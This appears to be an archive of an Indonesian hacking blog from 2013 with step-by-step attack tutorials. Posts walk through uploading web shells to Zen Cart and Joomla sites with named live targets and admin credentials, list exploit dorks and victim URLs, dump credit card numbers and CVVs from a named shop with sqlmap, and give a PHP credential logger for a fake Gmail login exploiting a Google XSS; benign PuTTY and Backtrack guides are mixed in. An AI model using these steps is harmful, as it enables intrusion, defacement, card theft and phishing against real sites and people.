Monday 2 December 2013

0 Upload Shell di Zencart

Upload Shell di Zencart – For Newbie
Screenshot
====================================================
[+] Title : Upload Shell di Zencart – For Newbie
[+] Author : afifzi
[+] Category : Hacking
====================================================
langsung aja,,,
1. Kita buka irc dulu untuk scan zencart nya,,,
2. Cari server yang ada bot scannernya, di sini saya menggunakan sever /s irc.jatimcom.net:7000
3. Setelah connect server kita masukkan dorknya, disini saya menggunakan dork : !zencart “zen cart” +Style
4. Setelah itu pilih salah satu site hasil scan kita tadi,
5. Saya memilih
http://cheapgoodingsale.info/admin/login.php

6. Kita buka lalu tinggal masukkan user dan passnya, user : mct, password : wew
7. Kemudian klik Product Types
8. Klik Edit

9. Setelah itu kita browse shell kita dan kita save.
10. Setelah itu kita klik Edit lagi dan block tulisan Product – General dan klik kanan pilih Copy Image Location.

11. Buka tab baru terus Ctrl + V
Sekian tutorial dari Antonkill semoga bermanfaat :D
Special Thanks to :
============================================================================
Indonesia Defacer || Lombok Crew || Team Pocong || IFC || Caliber || Jerinx || jatimcom Crew
============================================================================

Saturday 25 May 2013

1 How to using Fern-WiFi-Cracker on Backtrack 5 R3

Fern-WiFi-Cracker is a Wireless Penetration Testing Tool written in python. It provides a GUI for cracking wireless networks. Fern Wi-fi cracker automatically run aireplay-ng, airodump-ng and aircrack-ng when you execute Fern-WiFi-Cracker. They are run separately but Fern-WiFi-Cracker  uses the aircrack-ng suite of tools. You can use Fern-WiFi-Cracker  for Session Hijacking or locate geolocation of a particular system based on its Mac address. Before using Fern-WiFi-Cracker make sure that your wireless card supports packet injection.

You can open Fern-WiFi-Cracker with go to
Backtrack >> Exploitation Tools >> Wireless exploitation tools >> WLAN exploitation >> Fern-WiFi-Cracker
Then select your wireless interface
Click the Wi-Fi logo button on the top and it will start the network scanning. You can set setting by double click in the application window.
After scanning you will see active button of WiFi WEP cracking or WPA cracking. Because the available of WiFi is WEP click the button
New dialog box will open. Set the setting  with select the WEP network from the list and select the type of attack. After you complete set the setting now launch the attack with click the Attack button.
Wait until the progress bar 100% complete and after it’s complete the Fern WiFi Cracker will starts aircrack for cracking wifi password.
Password will be shown in the button of window.

Wednesday 15 May 2013

0 JCE Exploiter Dork List

Pertama download Dulu Softnya https://www.box.com/s/6irr9sluqkvzaon341m6
Dorknya :
inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart


Kemudia cari target http://www.kazan.monarh.su/ Ane pilih ini
tru site di dalam kolom soft seperti ini :


 
Click this bar to view the full image.
[Image: dIQBrtJ.png]
 


kemudian Klik start ini hasil exploitnya:


 
Click this bar to view the full image.
[Image: 7aa12e697cf147199f9dcdb.png]
 


http://www.kazan.monarh.su/images/stories/3xp.php
Oke gitu aja

 
Live target :
http://thiennguyen.vn/
http://yomeapunto.com/
http://monarh.su/
http://volga.monarh.su/
http://thonliab.promic.ac.th/

I
Part 3


Dork List New
inurl:joomla/index.php?option=com_virtuemart
inurl:uk/index.php?option=com_virtuemart
inurl:"joomla/index.php?option=com_jce"
tambahan tools 


 
[url=http://www.facebook.com/download/101489716725975/JCE%20New%20Update%20by%20no-c0de.rar]

Sunday 12 May 2013

0 Exploit Title: Com_Media (CMS JOOMLA)



# Exploit Title: Com_Media (CMS JOOMLA)
# Date: 12-05-2013
# Author: SultanHaikal
# Version: 2.5
# Tested on: Windows Xp & Linux 
# My Friend: Hmei7 - Black Angels - Netter - Panda07.
# Dork: inurl:com_media dan site:.com inurl:com_media kembangin lagi bro :P jangan mau enaknya aja

Pertama Serach google dork nya :D
Biar ga susah" gua kasih live target nya aja deh :D
www.ayrshirebridge.co.uk
www.magicrete.in 
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de

dan masih banyak lagi bro neh langsung aja ke TKP :

www.ayrshirebridge.co.uk 
nah gua pake live target web yang di atas ini coba lu tambahiin ini 
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
jadi seperti ini  

http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
ss:



Click Browse neh ini vuln nya file berbentuk : .txt .jpg .gif .png kalo .php dan html kayanya ngga work bro :D tapi misalnnya agan" bisa ya bagus lah di kembangin

jika bro sudah click browse nah pilih lah file anda :D contoh ss :)





nah saya browse file saya yang berbentuk .txt bernama x.txt 
lalu lu click Start upload tunggu sebentar dan selesai.

Jika ingin mengecek file kita tinggal tambahkan /images/filekita.txt 

done http://www.ayrshirebridge.co.uk/images/x.txt 

Sumber : Komandanseo

Friday 19 April 2013

0 Contoh Awal Penggunaan Putty untuk Mengakses VPS Melalui Port SSH

Balik ke belajar bagimana maintenance VPS. Beberapa hari yang lalu ada yabg bertanya, bagimana cara cepat mengakses VPS menggunakan putty sehingga kita bisa mengelola Linux VPS menggunakan command line dari komputer Windows.
Linux SSH untuk mengakses VPS
Bagi yang belum tahu, Putty sendiri adalah software/aplikasi yang bisa digunakan untuk mengakses server/komputer lain dari jarak menggunakan port SSH sehingga kita bisa meremote komputer/server tanpa harus datang langsung ke tempat di mana hardware dari komputer/server itu berada. Putty sendiri adalah software berbasis open source yang bisa anda download dengan gratis dari internet.
Berikut ini adalah contoh awal penggunaan Putty (Dengan asumsi anda sudah punya target server yang ingin diakses):
  • Bagi yang belum punya, download aplikasi Putty di website reminya di sini http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html. Pada bagian The Latest Release Version –> For Windows on Intel x86, pilih yang paling atas.
  • Tunggu sampai download selesai.
  • Copy file yang sudah anda download tadi ke folder C:\Windows. Kenapa harus folder Windows? Hal ini untuk mempercepat saja karena dengan menempatkannya pada folder Windows anda bisa mengakses file Putty secara cepat melalui form Run pada Start Menu.
  • Kemudian ketikkan putty [spasi] IP_Address dari server, atau domain dari server yang anda ingin akses. Di bawah ini adalah contoh gambar penggunakan putty untuk mengakses server melalui IP Addressmenggunakan port 22. Karena kita menggunakan port 22 maka kita tidak perlu menuliskan portnya lagi karena secara default port yang digunakan adalah port 22.
    Akses SSH melalui Start Menu pada Windows 7
  • Jika anda menggunakan port selain 22, maka anda harus menuliskan portnya secara manual pada perintah tersebut seperti putty -P [port-ssh] IP_Address dari server. Ingat, huruf P adalah huruf besar, bukan huruf kecil. Contoh penggunaanya bisa anda lihat dibawah ini (Dengan asumsi menggunakan port 2345).
    Putty SSH Server
  • Jika anda pertama kali mengakses server maka anda akan ditanya untuk menggunakan access key dari server. Untuk yang ini pilih Yes.
  • Setelah itu anda akan memasuki jendela putty. Di situ anda akan ditanya username dan password dari server SSH. Masukkan username dan password. Karena anda mengakses server Linux, maka ketika anda mengetikkan password, di jendela tidak akan menampilkan apa-apa sehingga orang lain yang melihat layar tidak akan tahu berapa huruf password yang sedang anda ketikkan.
  • Jika pasword anda salah, anda akan mendapatkan pesan Access Denied dan tentu saja anda harus mengulangi lagi dengan memasukkan password yang benar. Contoh penggunaan bisa anda lihat pada gambar di bawah ini.
    Login ke Server Menggunakan Putty
Untuk tips lainnya, anda bisa menambahkan opsi -pw pada Run sehingga anda tidak perlu mengetikkan password lagi ketika baru mengakses server. Contoh penggunaan bisa anda lihat pada gambar di bawah ini.
Memasukkan password pada SSH Putty untuk mempercepat proses Login
Itulah tadi dasar penggunaan putty untuk mengakses server. Di lain waktu saya akan menjabarkan lagi penggunaan putty yang lebih kompleks untuk optimasi server, terutama untuk server hosting dari website anda.

Thursday 18 April 2013

7 Cara Mendapatkan VCC Gratis ( Not Entropay )

Perbedaan Virtual Credit Card (VCC) dan Credit Card (CC)
perbedaannya hanya pada visualnya saya kalau VCC itu berbentuk virtual kalo CC itu real bisa kita pegang layaknya ATM.masih banyak service yang sediakan kartu kredit virtual hingga anda bisa memakainya tanpa mesti menyertakan rekening bank anda atau pergi melewati sistem yang kompleks. entropay, yaitu service sama yang disiapkan kartu virtual gratis ke pengguna. anda cuma butuh bikin akun untuk terima kartu kredit virtual bebas dari anda sendiri, namun servis itu di hentikan dikarenakan banyak pengguna yang menyalahgunakannya, saat ini banyak orang mencari-cari Cara Mendapatkan VCC Gratis ( Not Entropay ) pencarian mereka menemukan titik terang setelah muncul bancore.com yang menyediakan VCC gratis yang hanya membutuhkan verifikasi nomor Handphone.
Catatan : anda butuh sediakan nomer telephone anda ke situs ini, panggilan anda untuk memverifikasi identitas anda. bila anda tidak baik saja dengan itu, tak perlu pergi melewati tutorial. cuma membaca suatu hal yang lain : ) ( kamu mengerti apa yang saya maksud )
TUTORIAL

  • sign up di Bancore. yakinkan bahwa anda berikan nomer telephone anda yang sesungguhnya dikarenakan anda dapat terima panggilan pada telephone anda.
  • tekan pada Call Me. anda dapat terima panggilan pada telephone anda. sesaat di telephone, anda mesti memasukkan 4 digit pin pribadi.
  • saat ini masuk ke situs. ( password yaitu nomer pin yang sudah dimasukkan pada yakni telephone pada langkah 2 )
  • ini dapat menghendaki anda untuk memasukkan nama serta alamat e-mail.

  • cuma sesudah menghimpit simpan, anda dapat mendapatkan kartu kredit virtual anda.

NOTE : Kelebihan kartu kredit ini dari pada entropay adalah kartu ini bisa di isi ulang menggunakan voucher yang bisa di beli di situs vietnam, bisa untuk verifikasi Paypal,Ebay,Amazon,Itunes, minimal kartu ini harus diisi $5 untuk verifikasinya, dan juga bisa untuk membeli domain di Godaddy,Hostgator dan situs-situs yang menerima pembayaran via VISA.

Saturday 30 March 2013

15 Tutorial Carding ( with carding dork & sqlmap )

Tutorial Carding ( with carding dork & sqlmap )

Malam ini saya membuat tutorial karena teman saya ada yg minta .
Pertama kita siapkan tools" nya dahulu :

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :





Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="


Nah, web tersebut error saat kita inject ,





Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs

Disini kita mendapatkan 3 database :





[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema


Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :






Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 





Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+



Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat :)

Sunday 10 February 2013

0 Memanfaatkan Bug XSS di Google untuk Phishing (Fake Gmail Login)


Tutorial kali ini membuat Fake gmail login dengan memanfaatkan Bug XSS yang ada di situs Google dengan alamat url http://www.google.com/ig/directory?url=

1. Buat coding dengan format XML, seperti ini http://inwepo.com/test/google.xml

2. Buat coding PHP, berikut ini :

<?php
$username = $_POST['username'];
$password = $_POST['password'];
$logs = "save.txt";
$ld = fopen($logs, 'a') or die(" ");
$data = "$username:$password \n";
fwrite($ld, $data);
echo "Sorry this is Phishing!";
?>

Simpan dengan nama save.php

3. Kemudian upload semua script ke hosting kamu.

4. Akses dengan alamat sesuai nama domain kamu contohnya http://www.google.com/ig/directory?url=inwepo.com/test/google.xml

5. Bila ada seseorang yang mencoba login maka username dan password akan otomatis tersimpan di file txt. Akses dengan alamat  http://inwepo.com/test/save.txt

Sekian, semoga Google mau memperbaiki Bug XSS ini :)

Friday 25 January 2013

3 Cara Menginstall OS Backtrack Ke Handphone Android

kali ini saya akan menjelaskan tutorial installasi OS Backtrack di Android. ngomong ngomong udah pada tau bakctrack itu apa?. oke ane jelasin dikit Backtrack adalah salah satu distro linux yang merupakan turunan dari ubuntu yang mana merupakan merger dari whax dan auditor security collection. Jadi OS ini untuk menguji scurity n yang jelas tentang hack2 system ex. hack wifi dll. langsung aje nih daripada banyak cing cong. sedot bahan2 nya dibawah.. cekidoottt!!



SOURCE :

BACKTRACK : http://adf.ly/FRb32
UBUNTU : http://adf.ly/FRb5j
WINDOWS XP : http://adf.ly/FRb7N

Dikarnakan ane baru nyoba install Backtrack 5 jadi tutsnya cuma buat Backtrack aja yak. kalo yang lain ya silahkan experimen sendiri, tapi diluar tanggung jawab ane ya gan:ngakak

Spek Min :

Resolusi min HDPI

Prosesor min 1Ghz

RAM min 512MB

Free Memory 4GB



Langsung aja bahan-bahannya :

Backtrack 5 for ARM

Part 1 - BackTrack5ForARMDOWNLOAD

Part 2 - BackTrack5ForARMDOWNLOAD

Part 3 - BackTrack5ForARMDOWNLOAD



Android VNCDOWNLOAD

Terminal Emulator:  DOWNLOAD

BusyBoxDOWNLOAD


Step by Step

1. Satukan file pakai HJSPLIT download disini OS Bactracknya.

2. Extrack pakai 7z atau WinRAR.

3. Masukan folder bt5 ke sdcard HP kamu.

4. Buka Terminal Emulator

5. Ketik SU [enter]

6. Ketik cd /sdcard/bt5 [enter] atau cd sdcard [enter] cd bt5 [enter]

7. Ketik sh bt [enter]



8. Jika sudah keluar root@localhost# (pokoknya warna tulisannya merah) berarti sudah berhasil ini udah masuk text mode. Minimize Terminal Emulator tadi jangan sampai ke Close.




9. Cara masuk GUI. Buka Android VNC. Lalu isi.



Nickname: root

Password: root

Address: 127.0.0.1

Port: 5901

Warna ganti jadi 24bit aja.



10. Lalu klik CONNECT

11. Tara sudah berhasil masuk GUI Mode.

12. Cara mainnya harus di touch abaikan cursor :D



Tambahan

How to change default resolution:

Start up the BT5 image.

Make sure vnc server is not running by typing stopvnc.

In terminal emulator, type in: vi /usr/bin/startvnc

Change the resolution (800x480 default) to whatever you prefer. The Galaxy Nexus's native res is 1280x720.



Some helpful vi commands:

Vol Up + S = Down

Vol Up + W = Up

Vol Up + A = Left

Vol Up + D = Right

Vol Up + E = Esc (exit to browsing mode)

= Enter's "Insert" mode which allows the file to be edited.

:q! = exit without saving (must be typed in while in browse mode)

:wq = exit saving changes (must be typed in while in browse mode)



ScreenShoot (Untuk Bisa Browsing harus nyalakan WiFi dulu sebelum masuk terminal):















TEST ON : Samsung Galaxy Nexus







Jangan lupa komen ya gan, karna komentar anda2 sangat membantu bagi perkembangan

Find Us on Facebook !